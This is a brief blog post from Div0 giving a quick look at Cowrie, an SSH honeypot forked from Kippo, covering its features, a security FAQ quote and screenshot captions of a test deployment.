• Div0 Blog Editor

Cowrie – A SSH Honeypot (A Quick Glimpse)

Cowrie – written by Michel Oosterhof – is a medium interaction SSH honeypot designed to log brute force attacks and shell interactions performed by the attackers. (Sounds familiar? Yes, it is a fork from Kippo).

The motivation of this blog post is to provide a quick glimpse at Cowrie – get a brief experience of what it’s like to handle Cowrie, and what’s the deployment process like, etc.

Everything you need is in the Github Repo

Michel did a very good job explaining what Cowrie is all about, how to set it up, etc. – All pretty much self-contained in the Github repo (https://github.com/micheloosterhof/cowrie).

Very similar to Kippo

If you’re already familiar with Kippo, you’ll be very comfortable with Cowrie. It also has many additional features on top of Kippo which I’ve yet to play with:

  • SFTP and SCP support for file upload;

  • Support for SSH exec command;

  • Logging of direct-TCP connection attempts (SSH proxying);

  • Logging in JSON format for easy processing in log management solutions; and

  • Many, many additional commands.

Is it secure?

Michel directed this question to the FAQ of Kippo: https://github.com/desaster/kippo/wiki/FAQ.

“Kippo is written in Python, and doesn’t call any external software, so it’s probably somewhat secure. Kippo has not had any real security audit done on it, and it’s definitely vulnerable to some DoS attacks (no limits on how many people can connect to it, or how many files they can download). It’s recommended to run Kippo in a well firewalled virtual machine.”

Conclusion

This is a really quick glimpse at Cowrie. It’s very easy to set up, and it looks very promising.


My Setup

Some Screenshots

Running Cowrie on port 2222. ifconfig reflects the correct IP address.


curl


Attackers' wget items remain in the fake filesystem

Author

Emil Tan, Chapter Lead, The Honeynet Project, Singapore Chapter

2 views

Contact Us

Terms of Use | Code of Conduct

All rights reserved.

Division Zero (Div0) © 2017-2020.

Edgis © 2011-2017.